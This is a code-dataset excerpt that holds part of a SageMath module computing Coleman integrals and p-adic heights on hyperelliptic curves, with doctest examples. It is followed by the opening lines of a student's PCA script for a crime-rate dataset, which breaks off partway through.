+ 2*7^2 + 3*7^3 + 6*7^4 + 5*7^5 + 4*7^6 + 6*7^7 + 2*7^8 + 5*7^9 + O(7^10)\n 3*7 + 7^2 + 6*7^3 + 3*7^4 + 7^6 + 7^7 + 3*7^8 + 2*7^9 + O(7^10)\n Test that h_7(Pprime-P, R-S) = h_7(Q-Qprime, R-S), where (Pprime)-(P) ~ (Q)-(Qprime)\n sage: HK.height([(1,Pprime),(-1,P)],[(1,R),(-1,S)],9)\n 3*7 + 7^3 + 7^4 + 7^5 + 2*7^6 + 2*7^7 + 7^8 + O(7^10)\n sage: HK.height([(1,Q),(-1,Qprime)],[(1,R),(-1,S)],9)\n 3*7 + 7^3 + 7^4 + 7^5 + 2*7^6 + 2*7^7 + 7^8 + O(7^10)\n GENUS 2 EXAMPLES\n (with respect to W the unit root subspace)\n sage: R. = PolynomialRing(pAdicField(11,10))\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: P = H(-4,24)\n sage: Pprime = H.teichmuller(P)\n sage: Q = H(5,30)\n sage: Qprime = H.teichmuller(Q)\n sage: H.height([(1,Q),(-1,Qprime)],[(1,P),(-1,Pprime)],10)\n 6*11^2 + 9*11^3 + 4*11^4 + 2*11^5 + 6*11^6 + 4*11^7 + 6*11^8 + 11^9 + O(11^10)\n sage: H.height([(1,P),(-1,Pprime)],[(1,Q),(-1,Qprime)],10)\n 6*11^2 + 9*11^3 + 4*11^4 + 2*11^5 + 6*11^6 + 4*11^7 + 6*11^8 + 11^9 + O(11^10)\n sage: R. = PolynomialRing(pAdicField(11,10))\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: P = H(-4,24)\n sage: Pprime = H(-4,-24)\n sage: Q = H(5,30)\n sage: Qprime = H(5,-30)\n sage: H.height([(1,P),(-1,Pprime)],[(1,Q),(-1,Qprime)],10)\n 6*11^-1 + 10 + 7*11 + 6*11^2 + 3*11^3 + 7*11^4 + 7*11^5 + 11^6 + O(11^8)\n sage: H.height([(1,Q),(-1,Qprime)],[(1,P),(-1,Pprime)],10)\n 6*11^-1 + 10 + 7*11 + 6*11^2 + 3*11^3 + 7*11^4 + 7*11^5 + 11^6 + O(11^8)\n sage: R. = Qp(11,10)['x']\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: P = H(-4,24)\n sage: Q = H(5,30)\n sage: R = H(1,6)\n sage: S = H(-2,12)\n sage: H.height([(1,P),(-1,Q)],[(1,R),(-1,S)],10)\n 7*11^-1 + 3 + 8*11 + 6*11^2 + 5*11^3 + 7*11^4 + 3*11^5 + 9*11^6 + 6*11^7 + O(11^8)\n sage: H.height([(1,R),(-1,S)],[(1,P),(-1,Q)],10)\n 7*11^-1 + 3 + 8*11 + 6*11^2 + 5*11^3 + 7*11^4 + 3*11^5 + 9*11^6 + 6*11^7 + O(11^8)\n \"\"\"\n if prec == None:\n prec = self.base_ring().precision_cap()\n P = divisor1[0][1]\n Q = divisor1[1][1]\n R = divisor2[0][1]\n S = divisor2[1][1]\n if P == R and Q == S == self(0,1,0):\n negP = self(P[0],-P[1])\n div1 = [(1,P),(-1,negP)]\n int_eta = self.init_height(div1,div1,prec)\n int_eta = self.eta_integral(div1,div1)\n Q = self.find_Q(P)\n negQ = self(Q[0],-Q[1])\n int_omega_at_P = self.special_int_omega(P)\n int_omega_P_to_Q = int_omega_at_P(Q[0]-P[0]) + log(Q[0]-P[0],0)\n self.init_height([(1,P),(-1,negP)],[(1,Q),(-1,negQ)])\n int_omega_wQ_to_Q = self.omega_integral([(1,P),(-1,negP)],[(1,Q),(-1,negQ)])\n height_minus = -2*int_omega_P_to_Q + int_omega_wQ_to_Q - int_eta\n b = P[1]\n return 1/QQ(4)*log(4*b**2) + 1/QQ(4)*height_minus\n\n else:\n self.init_height(divisor1,divisor2,prec)\n if (self.is_weierstrass(R) and self.is_weierstrass(S)):\n eta = 0\n else:\n eta = self.eta_integral(divisor1,divisor2)\n omega = self.omega_integral(divisor1,divisor2,prec,cggen)\n return omega - eta\n\n def neg_point(self,P):\n return self(P[0],-P[1])\n\n def is_ordinary(self):\n \"\"\"\n determines if self.base_ring().prime() is a prime of ordinary reduction\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n g = self.genus()\n f = M_frob.charpoly()\n if f.list()[g].valuation() == 0:\n return True\n else:\n return False\n\n\n def local_analytic_interpolation_cyclotomic(self,P,Q,prec=100):\n \"\"\"\n Given P and x(Q), with P,Q\n in the same residue disc and P defined over Qp,\n this computes the local analytic interpolation\n between P,Q\n USE: for non-weierstrass points\n \"\"\"\n #print \"local_analytic_interpolation_cyclotomic\", prec\n #R = Q.parent()[['t']]\n #t = R.gen()\n #R.set_default_prec(prec)\n R = PowerSeriesRing(Q.parent(), 't', default_prec = prec)\n t = R.gen()\n x,y = self.local_coord(P,prec) #figure out precision here\n X = (x(R((Q-P[0])*t)))\n Y = (y(R((Q-P[0])*t)))\n return X,Y\n\n def tiny_integrals_on_basis_to_z(self,b):\n \"\"\"\n Returns all tiny integrals on basis to a parameter z\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n prec = self.base_ring().precision_cap()\n x,y = self.local_coord(b,prec)\n #S = self.base_ring()[['z']]\n #z = S.gen()\n #S.set_default_prec(prec+10)\n S = PowerSeriesRing(S, 'z', default_prec=prec+10)\n z = S.gen()\n d = self.hyperelliptic_polynomials()[0].degree()\n return [((x**i)*x.derivative()/(2*y)).integral()(z) for i in range(d-1)]\n\n def tiny_double_integrals_on_basis_to_z(self,b):\n \"\"\"\n Returns all tiny double integrals on basis unless b is infinity:\n then just returns \\int w0 w0, \\int w0 \\int w_{2g-1}... \\int w_{g-1} w_{2g-1}\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n prec = self.base_ring().precision_cap()\n x,y = self.local_coord(b,prec)\n #S = self.base_ring()[['z']]\n d = self.hyperelliptic_polynomials()[0].degree()\n #z = S.gen()\n #S.set_default_prec(prec+10)\n S = PowerSeriesRing(S, 'z', prec+10)\n z = S.gen()\n\n inner = self.tiny_integrals_on_basis_to_z(b)\n doubles = []\n for i in range(d-1):\n doubles = doubles + [( ((x**i*x.derivative()/(2*y))(z))*J).integral() for J in inner]\n return doubles\n\n def coleman_integrals_on_basis_to_z(self, P, Q):\n \"\"\"\n INPUT:\n - P: a non-Weierstrass point\n - Q: a point whose residue disc is where computations are taking place\n **i.e., we're doing things wrt z + Q[0]\n OUTPUT:\n Returns the vector (\\int_P^Q x^i dx/(2y))\n\t EXAMPLES:\n\t sage: R. = QQ['x']\n\t sage: E = EllipticCurve('37a1')\n\t sage: H = E.short_weierstrass_model()\n\t sage: K = Qp(5,10)\n\t sage: HK = H.change_ring(K)\n\t sage: P = HK(0,4)\n\t sage: Q = HK(4,4)\n\t sage: f = HK.coleman_integrals_on_basis_to_z(P,Q)\n\t sage: f(0)\n\t (4*5 + 4*5^2 + 4*5^3 + 3*5^5 + 2*5^6 + 2*5^7 + 2*5^8 + 5^9 + O(5^10), 2 + 2*5 + 3*5^2 + 3*5^3 + 3*5^4 + 3*5^5 + 2*5^6 + 3*5^7 + 4*5^8 + 3*5^9 + O(5^10))\n\t sage: HK.coleman_integrals_on_basis(P,Q)\n\t (4*5 + 4*5^2 + 4*5^3 + 3*5^5 + 2*5^6 + 2*5^7 + 2*5^8 + 5^9 + O(5^10), 2 + 2*5 + 3*5^2 + 3*5^3 + 3*5^4 + 3*5^5 + 2*5^6 + 3*5^7 + 4*5^8 + 3*5^9 + O(5^10))\n\t sage: HK.lift_x(4+5,all=True)[1]\n\t (4 + 5 + O(5^10) : 4 + 4*5 + 2*5^2 + 2*5^3 + 5^4 + 4*5^5 + 3*5^6 + 2*5^7 + O(5^10) : 1 + O(5^10))\n\t sage: R = HK.lift_x(4+5,all=True)[1]\n\t sage: f(5)\n\t (5 + 3*5^2 + 5^3 + 3*5^4 + 5^5 + 5^6 + 2*5^7 + 2*5^8 + 5^9 + O(5^10), 2 + 3*5^2 + 3*5^3 + 2*5^5 + 4*5^6 + 5^7 + 4*5^8 + 2*5^9 + O(5^10))\n\t sage: HK.coleman_integrals_on_basis(P,R)\n\t (5 + 3*5^2 + 5^3 + 3*5^4 + 5^5 + 5^6 + 2*5^7 + 2*5^8 + 5^9 + O(5^10), 2 + 3*5^2 + 3*5^3 + 2*5^5 + 4*5^6 + 5^7 + 4*5^8 + 2*5^9 + O(5^10))\n AUTHOR:\n - Jennifer Balakrishnan (2010-05)\n - Jennifer Balakrishnan (2015-04): added functionality for even degree models\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n K = self.base_ring()\n #S = PowerSeriesRing(K,names='z')\n prec = K.precision_cap()\n p = K.prime()\n prec = prec +10\n #S.set_default_prec(prec)\n #z = S.gen()\n S = PowerSeriesRing(K,'z',default_prec=prec)\n z = S.gen()\n d = self.hyperelliptic_polynomials()[0].degree()\n dim = d - 1\n disc = self.residue_disc(Q)\n Qold = Q\n Q = self.lift_x(z + Q[0])\n if (Q[1] - Qold[1]).valuation() < 1:\n Q = (Q[0], -Q[1])\n #if self.residue_disc(Q) != disc:\n # Q = (Q[0],-Q[1])\n x,y = self.local_coord_with_z(Q,prec)\n integrals = [(x**i*x.derivative()/(2*y)).integral() for i in range(dim)]\n if self.is_same_disc(P,Qold):\n return vector([-I(P[0]-Q[0]) for I in integrals])\n else:\n return self.coleman_integrals_on_basis(P,Qold) + vector([-I(-z) for I in integrals])\n\n def local_coord_with_z(self, P, prec = 20, name='t'):\n \"\"\"\n For a non-Weierstrass point $P = (z,\\sqrt(f(z)))$ on the hyperelliptic curve\n $y^2 = f(x)$, returns $(x(t),y(t))$ such that $y(t)^2 = f(x(t))$, where $t = x-z$\n is the local parameter.\n INPUT:\n - $P = (z, \\sqrt(f(z)))$ is a non-Weierstrass point on self\n - prec: desired precision of the local coordinates\n - name: gen of the power series ring (default: 't')\n OUTPUT:\n $(x(t),y(t))$ such that $(y(t))^2 = f(x(t))$ and $t = x -a$ is the\n local parameter at $P$\n AUTHOR:\n - Jennifer Balakrishnan (2007-12)\n \"\"\"\n d = P[1]\n if d == 0:\n raise TypeError(\"P = %s is a Weierstrass point \"%P)\n pol = self.hyperelliptic_polynomials()[0]\n #L = PowerSeriesRing((P[0]).parent(),name)\n #t = L.gen()\n #L.set_default_prec(prec)\n L = PowerSeriesRing((P[0]).parent(),name, default_prec=prec)\n t = L.gen()\n K = PowerSeriesRing(L, 'x')\n pol = K(pol)\n x = K.gen()\n b = P[0]\n f = pol(t+b)\n for i in range((RR(log(prec)/log(2))).ceil()):\n d = (d + f/d)/2\n return t+b+O(t**(prec)), d + O(t**(prec))\n\n def double_integrals_on_basis_via_teich(self,P,Q):\n \"\"\"\n The integrals $\\int_P^Q w_0 w_0, \\int_P^Q w_0 w_1, ..., \\int_P^Q w_{2g-1} w_{2g-1}$, ,\n computed via Teichmueller points in the discs of $P,Q$\n INPUT:\n - P: non-Weierstrass point on self\n - Q: non-Weierstrass point on self\n OUTPUT:\n The integrals $\\{\\int_P^Q w_i w_j\\}_{i,j= 0,..., 2g-1}$, where $w_i = x^i dx/(2y)$\n EXAMPLES:\n We check against the implementation of double integrals that doesn't use Teichmueller pts:\n sage: R. = QQ['x']\n sage: E = HyperellipticCurve(x^3-4*x+4)\n sage: K = Qp(5,8)\n sage: EK = E.change_ring(K)\n sage: P = EK(2,2)\n sage: Q = EK(1,1)\n sage: EK.double_integrals_on_basis_via_teich(P,Q)\n (2*5^4 + 3*5^5 + 2*5^6 + O(5^8), 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8),\n 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + O(5^7))\n sage: EK.double_integrals_on_basis(P,Q)\n (2*5^4 + 3*5^5 + 2*5^6 + 4*5^8 + O(5^9), 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8),\n 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + 3*5^7 + O(5^8))\n A Fubini-style check that $\\int_P^Q w_i w_j = \\int_Q^P w_j w_i$:\n sage: EK.double_integrals_on_basis_via_teich(Q,P)\n (2*5^4 + 3*5^5 + 2*5^6 + O(5^8), 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8),\n 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + O(5^7))\n sage: EK.double_integrals_on_basis(Q,P)\n (2*5^4 + 3*5^5 + 2*5^6 + 4*5^8 + O(5^9), 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8),\n 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + 3*5^7 + O(5^8))\n AUTHOR:\n Jennifer Balakrishnan\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n A = M_frob.transpose()\n TP = self.teichmuller(P)\n TQ = self.teichmuller(Q)\n g = self.genus()\n d = self.hyperelliptic_polynomials()[0].degree()\n if d%2==1:\n dim = 2*g\n else:\n dim = 2*g+1\n\n TP_to_P_iter = self.tiny_double_integrals_on_basis(TP,P)\n P_to_Q_sing = self.coleman_integrals_on_basis(P,Q)\n TP_to_P_sing = self.tiny_integrals_on_basis(TP,P)\n Q_to_TQ_sing = self.tiny_integrals_on_basis(Q,TQ)\n TP_to_TQ_sing = self.coleman_integrals_on_basis(TP,TQ)\n TQ_to_Q_iter = self.tiny_double_integrals_on_basis(TQ,Q)\n\n ##first find the double integrals between Teichmueller points:\n A_rows = A.rows()\n\n const = []\n xm,ym = self.monsky_washnitzer_gens()\n w = self.invariant_differential()\n for i in range(dim):\n Ai = A_rows[i]\n fi = forms[i]\n for k in range(dim):\n Ak = A_rows[k]\n fk = forms[k]\n p1 = -fk(TP[0],TP[1])*(fi(TQ[0],TQ[1])-fi(TP[0],TP[1]))\n p2 = self.coleman_integral(fi.diff()*fk,TP,TQ)\n p3 = -Ai*fk(TP[0],TP[1])*TP_to_TQ_sing\n if i == k:\n p4 =0\n else:\n p4 = (Ai*vector([self.coleman_integral(xm**l*w*w._coeff.parent()(fk),TP,TQ) for l in range(dim)]) - Ak*vector([self.coleman_integral(xm**l*w*w._coeff.parent()(fi),TP,TQ) for l in range(dim)]))\n p5 = fi(TQ[0],TQ[1])*Ak*TP_to_TQ_sing\n const = const + [p1+p2 + p3 + p4 + p5]\n AA = A.tensor_product(A)\n I = identity_matrix(dim**2)\n const = vector(const)\n teich = (I-AA)**(-1)*(const)\n\n ##then correct endpoints\n integrals = []\n for i in range(dim):\n for k in range(dim):\n integrals = integrals + [-TP_to_P_iter[dim*i+k] + teich[dim*i+k] - P_to_Q_sing[i]*TP_to_P_sing[k] - Q_to_TQ_sing[i]*TP_to_TQ_sing[k] + TQ_to_Q_iter[dim*i+k]]\n\n return vector(integrals)\n\n def double_integrals_on_basis(self,P,Q):\n \"\"\"\n The double integrals on basis differentials:\n $\\int_P^Q w_0 w_0, \\int_P^Q w_0 w_1, ..., \\int_P^Q w_{2g-1} w_{2g-1}$\n (via Frobenius)\n INPUT:\n - P: non-Weierstrass point on self\n - Q: non-Weierstrass point on self\n OUTPUT:\n The double integrals\n $\\int_P^Q w_0 w_0, \\int_P^Q w_0 w_1, ..., \\int_P^Q w_{2g-1} w_{2g-1}$, where\n $w_i = x^i dx/(2y)$\n EXAMPLES:\n We check against the implementation that uses Teichmueller points:\n sage: R. = QQ['x']\n sage: E = HyperellipticCurve(x^3-4*x+4)\n sage: K = Qp(5,8)\n sage: EK = E.change_ring(K)\n sage: P = EK(2,2)\n sage: Q = EK(1,1)\n sage: EK.double_integrals_on_basis_via_teich(P,Q)\n (2*5^4 + 3*5^5 + 2*5^6 + O(5^8), 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8),\n 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + O(5^7))\n sage: EK.double_integrals_on_basis(P,Q)\n (2*5^4 + 3*5^5 + 2*5^6 + 4*5^8 + O(5^9), 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8),\n 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + 3*5^7 + O(5^8))\n A Fubini-style check that $\\int_P^Q w_i w_j = \\int_Q^P w_j w_i$:\n sage: EK.double_integrals_on_basis_via_teich(Q,P)\n (2*5^4 + 3*5^5 + 2*5^6 + O(5^8), 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8),\n 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + O(5^7))\n sage: EK.double_integrals_on_basis(Q,P)\n (2*5^4 + 3*5^5 + 2*5^6 + 4*5^8 + O(5^9), 2*5^2 + 3*5^4 + 3*5^5 + 5^6 + 5^7 + O(5^8),\n 2*5^2 + 3*5^3 + 3*5^5 + 3*5^6 + 3*5^7 + O(5^8), 2 + 4*5^2 + 2*5^4 + 3*5^5 + 3*5^7 + O(5^8))\n Checking that things are consistent for even degree models:\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^6 + 31*x^4 + 31*x^2 + 1)\n sage: K = Qp(13,10)\n sage: HK = H.change_ring(K)\n sage: P = HK(0,1)\n sage: I = HK.coleman_integrals_on_basis(P,HK(1,8))\n sage: J = HK.double_integrals_on_basis(P,HK(1,8))\n sage: I[0]^2/2-J[0]\n O(13^10)\n sage: J[1] + J[5]-I[0]*I[1]\n O(13^10)\n sage: J[2] + J[10] - I[0]*I[2]\n O(13^10)\n sage: J[3] + J[15] - I[0]*I[3]\n O(13^9)\n sage: J[4] + J[20] - I[0]*I[4]\n O(13^9)\n sage: J[6] - I[1]^2/2\n O(13^11)\n sage: J[7] + J[11] - I[1]*I[2]\n O(13^10)\n sage: J[8] + J[16] - I[1]*I[3]\n O(13^9)\n sage: J[9] + J[21] - I[1]*I[4]\n O(13^9)\n sage: J[12] - I[2]^2/2\n O(13^10)\n sage: J[13] + J[17] - I[2]*I[3]\n O(13^9)\n sage: J[14] + J[22] - I[2]*I[4]\n O(13^9)\n sage: J[18] - I[3]^2/2\n O(13^9)\n sage: J[19] + J[23] - I[3]*I[4]\n O(13^8)\n sage: J[24] - I[4]^2/2\n O(13^8)\n AUTHOR:\n Jennifer Balakrishnan (2010-04)\n Jennifer Balakrishnan (2015-04): added functionality for even degree models\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n d = self.hyperelliptic_polynomials()[0].degree()\n dim = d - 1\n if P == Q:\n return vector([0]*(2*dim)**2)\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n p = self.base_ring().prime()\n FP = self.frobenius(P)\n FQ = self.frobenius(Q)\n A = M_frob.transpose()\n A_rows = A.rows()\n g = self.genus()\n const = []\n fix = []\n xm,ym = self.monsky_washnitzer_gens()\n w = self.invariant_differential()\n\n P_to_Q_sing = self.coleman_integrals_on_basis(P,Q)\n\n Q_to_FQ_sing = self.tiny_integrals_on_basis(Q,FQ)\n\n FP_to_P_sing = self.tiny_integrals_on_basis(FP,P)\n\n if P[0].parent() == self.base_ring() and FP[0].parent() == self.base_ring():\n FP_to_P_iter = self.tiny_double_integrals_on_basis(FP,P)\n elif self.residue_disc(P) == self.change_ring(GF(p))(0,1,0):\n print(\"using double integrals in infinite disk\")\n FP_to_P_iter = self.tiny_double_integrals_on_basis_in_infinite_disc(FP,P)\n else:\n return(\"haven't implemented this case yet\")\n FP_to_FQ_sing = FP_to_P_sing + P_to_Q_sing + Q_to_FQ_sing\n\n if Q[0].parent() == self.base_ring() and FQ[0].parent() == self.base_ring():\n FQ_to_Q_iter = self.tiny_double_integrals_on_basis(FQ,Q)\n else:\n print(\"using double integrals in infinite disk\")\n FQ_to_Q_iter = self.tiny_double_integrals_on_basis_in_infinite_disc(FQ,Q)\n\n int_xpowldxfk = [[self.coleman_integral(xm**l*w*w._coeff.parent()(form),P,Q) for l in range(dim)] for form in forms]\n\n if g == 1:\n formsq = [(f**2)/ZZ(2) for f in forms]\n f0f1 = forms[0]*forms[1]\n int_df0f1 = self.coleman_integral(forms[0].diff()*forms[1],P,Q)\n int_dfifk = [formsq[0](Q[0],Q[1]) -formsq[0](P[0],P[1]), int_df0f1 , f0f1(Q[0],Q[1]) - f0f1(P[0],P[1]) - int_df0f1 ,formsq[1](Q[0],Q[1]) -formsq[1](P[0],P[1])]\n fP = [f(P[0],P[1]) for f in forms]\n fQ = [f(Q[0],Q[1]) for f in forms]\n\n for i in range(dim):\n Ai = A_rows[i]\n fi = forms[i]\n for k in range(dim):\n Ak = A_rows[k]\n fk = forms[k]\n fkP = fP[k]\n fiP = fP[i]\n fiQ = fQ[i]\n p1 = -fkP*(fiQ-fiP)\n if g!= 1:\n p2 = self.coleman_integral(fi.diff()*fk,P,Q)\n else:\n p2 = int_dfifk[dim*i + k]\n p3 = -Ai*fkP*P_to_Q_sing\n if i == k:\n p4 =0\n else:\n p4 = (Ai*vector(int_xpowldxfk[k]) - Ak*vector(int_xpowldxfk[i]))\n p5 = fiQ*Ak*P_to_Q_sing\n const = const + [p1+p2 + p3 + p4 + p5]\n fix = fix + [-FP_to_P_iter[dim*i+k] - P_to_Q_sing[i]*FP_to_P_sing[k] - Q_to_FQ_sing[i]*FP_to_FQ_sing[k] + FQ_to_Q_iter[dim*i+k]]\n const = vector(const)\n fix = vector(fix)\n AA = A.tensor_product(A)\n v = fix + const\n I = identity_matrix(dim**2)\n return ((I-AA).inverse())*(v)\n\n def tiny_double_integrals_on_basis(self,P,Q):\n \"\"\"\n The tiny double integrals on basis differentials:\n $\\int_P^Q w_0 w_0, \\int_P^Q w_0 w_1, ..., \\int_P^Q w_{2g-1} w_{2g-1}$\n INPUT:\n - P: non-Weierstrass point on self\n - Q: point on self in same disc as P\n OUTPUT:\n the tiny double integrals on basis differentials:\n $\\{\\int_P^Q w_i w_j\\}_{i,j= 0,..., 2g-1}$, where $w_i = x^i dx/(2y)$\n EXAMPLES:\n We check consistency with single Coleman integrals:\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-4*x+4)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: P = HK.lift_x(2)\n sage: FP = HK.frobenius(P)\n sage: I = HK.tiny_double_integrals_on_basis(P,FP)\n sage: C = HK.tiny_integrals_on_basis(P,FP)\n sage: I[1]+I[2] == C[0]*C[1]\n True\n sage: I[0] == C[0]^2/2\n True\n sage: I[3] == C[1]^2/2\n True\n An error if points are not in the same disc:\n sage: Q = HK.lift_x(1)\n sage: HK.tiny_double_integrals_on_basis(P,Q)\n Traceback (most recent call last):\n ...\n ValueError: (2 + O(5^8) : 2 + O(5^8) : 1 + O(5^8)) and (1 + O(5^8) : 1 + O(5^8) : 1 + O(5^8)) are not in the same residue disc\n AUTHOR:\n Jennifer Balakrishnan: odd (2010)\n JSB: even (2012)\n \"\"\"\n g = self.genus()\n d = self.hyperelliptic_polynomials()[0].degree()\n if d%2 == 1:\n dim = 2*g\n else:\n dim = 2*g+1\n\n if P == Q:\n return vector((dim**2)*[0])\n try:\n if self.is_same_disc(P,Q) == False:\n raise ValueError(\"%s and %s are not in the same residue disc \"%(P,Q))\n except TypeError:\n pass\n p = self.base_ring().prime()\n integrals = []\n xP,yP = self.local_coord(P)\n single_ints = self.tiny_integrals_on_basis(P,Q)\n I2 = [(xP**j*xP.derivative()/(2*yP)).integral() for j in range(dim)]\n S = PowerSeriesRing(P[0].parent(),names='a')\n a = S.gen()\n I2_vals = [pol(a) for pol in I2]\n x = xP(a)\n y = yP(a)\n for i in range(dim):\n for j in range(dim):\n if j == i:\n integrals = integrals + [((single_ints[j])**2)/2]\n elif j > i:\n I1 = (x**i*(x.derivative())*I2_vals[j]/(2*y)).integral()\n if P[1] != 0:\n integrals = integrals + [I1(Q[0]-P[0])]\n else:\n #weierstrass case: parameter is y-coord\n integrals = integrals + [I1(Q[1])]\n\n else:\n integrals = integrals + [single_ints[j]*single_ints[i]-integrals[(dim)*j+i]]\n return vector(integrals)\n\n def tiny_double_integral_in_infinite_disc(self,i,j,P,Q):\n \"\"\"\n P,Q are points in the infinite disc\n If one of P,Q is the point at infinity, then beware that\n the \"constant term = 0 normalization\" forces some\n unexpected behavior\n INPUT:\n - i, j: nonnegative integers\n - P, Q: points in infinite disc\n OUTPUT: \\int_P^Q x^i dx/2y x^j dx/2y\n EXAMPLES:\n sage: R = QQ['x']\n sage: x = R.gen()\n sage: H = HyperellipticCurve(x**3-3483*x+74358)\n sage: p = ZZ(7)\n sage: deg = ZZ(20)\n sage: prec = 10\n sage: K = Qp(p,prec)\n sage: HK = H.change_ring(K)\n sage: xx,yy = HK.local_coordinates_at_infinity(prec*deg)\n sage: J = K.extension(x**deg-p,names='a')\n sage: a = J.gen()\n sage: HJ = H.change_ring(J)\n sage: P = HJ(xx(a),yy(a))\n sage: Q = HK(63,324)\n sage: S = HK(-9,324)\n sage: b = HK(0,1,0)\n sage: W = HK(27,0)\n sage: I = HK.tiny_integrals_on_basis(b,P)\n sage: J = HK.tiny_double_integrals_on_basis_in_infinite_disc(b,P)\n Things are a little weird if we're working with the tangential\n basepoint at infinity:\n sage: J[0] + O(a^150) - I[0]^2/ZZ(2)\n O(a^150)\n sage: J[1] + O(a^150)+ J[2] - I[0]*I[1] ####See explanation above\n 1 + O(a^150)\n sage: J[3] + O(a^150) - I[1]^2/2\n O(a^150)\n But things work how you'd expect if neither point is infinity:\n sage: FP = HK.frobenius(P)\n sage: I = HK.tiny_integrals_on_basis(P,FP)\n sage: J = HK.tiny_double_integrals_on_basis_in_infinite_disc(P,FP)\n sage: J[0] + O(a^150) - I[0]^2/ZZ(2)\n O(a^150)\n sage: J[1] + O(a^150)+ J[2] - I[0]*I[1]\n O(a^150)\n sage: J[3] + O(a^150) - I[1]^2/2\n O(a^150)\n \"\"\"\n K = (P[0]).parent()\n p = K.prime()\n prec = max(Q[0].parent().precision_cap(),P[0].parent().precision_cap())\n xi,yi = self.local_coordinates_at_infinity(prec)\n f = self.hyperelliptic_polynomials()[0]\n I2 = (xi**j*xi.derivative()/(2*yi)).integral()\n #S = K[['u']]\n #u = S.gen()\n #S.set_default_prec(prec)\n S = PowerSeriesRing(K, 'u', default_prec=prec)\n u = S.gen()\n\n g = self.genus()\n Pval = P[0]**g/P[1]\n Qval = Q[0]**g/Q[1]\n I2val = I2(u) - I2(Pval)\n xi = xi(u)\n yi = yi(u)\n I = (xi**i*xi.derivative()*I2val/(2*yi))\n if I.valuation() < 0:\n v = I.valuation()\n c = I.list()[-v-1]\n t = xi.parent().gen()\n I = (I-c*t**(-1)).integral()\n if Pval == 0 and not Qval.is_unit():\n b_to_P = I(Qval)-I(Pval)+c*log(Qval/p**(Qval.valuation()))\n elif Qval == 0 and not Pval.is_unit():\n b_to_P = I(Qval)-I(Pval) -c*log(Pval/p**(Pval.valuation()))\n elif not Qval.is_unit() and not Pval.is_unit():\n b_to_P = I(Qval)-I(Pval) +c*log(Qval/p**(Qval.valuation()))-c*log(Pval/p**(Pval.valuation()))\n else:\n raise ValueError(\"One of Pval or Qval is a unit. Need logs for this.\")\n else:\n I = I.integral()\n b_to_P = I(Qval)-I(Pval)\n return b_to_P\n","sub_path":"hyperelliptic_padic_field.py","file_name":"hyperelliptic_padic_field.py","file_ext":"py","file_size_in_byte":122290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"171036683","text":"#Danny Radosevich\r\n# you cannot use PCA library\r\n#STEPS FROM LECTURE\r\n#Estimate SIGMA_x\r\n#SIG_x = (1/n)(SIG1-n)(Xi-mew)(xi-mew)^T where mew = (1/n) SIG(1-n)x_i\r\n#Apply package to get eigenvectors w\r\n#Also get assosciated values\r\n#eigvals, eigvecs = np.linalg.eig(SIG)\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as mpl\r\n\r\n#\r\ndata = np.genfromtxt('crimerate.csv', delimiter=',')\r\nsample = data[:,0:-1]\r\nlabel = data[:,-1]\r\n[n,p] = sample.shape\r\n\r\n\r\n\r\n# let's learn PCA vectors from the entire sample set (i.e., \"sample\")\r\n# note that label is not used -- therefore PCA is an \"unsuperivsed learning\" technique\r\n# cannot use PCA libraries; can use libraries to find eigenvectors/eigenvalues of a matrix\r\ndef getMew():\r\n n = 0\r\n for x in sample:\r\n n +=1\r\n #print(mew)\r\n #mew = np.asarray(mew)\r\n return (sample.dot(1/n))\r\ndef getSigma():\r\n #stuff und things\r\n mew = getMew()\r\n pca = []\r\n n = 0\r\n line =\"\"\r\n for x in sample:\r\n n += 1\r\n #xmew = x-mew\r\n #print(xmew.shape)\r\n #trans = 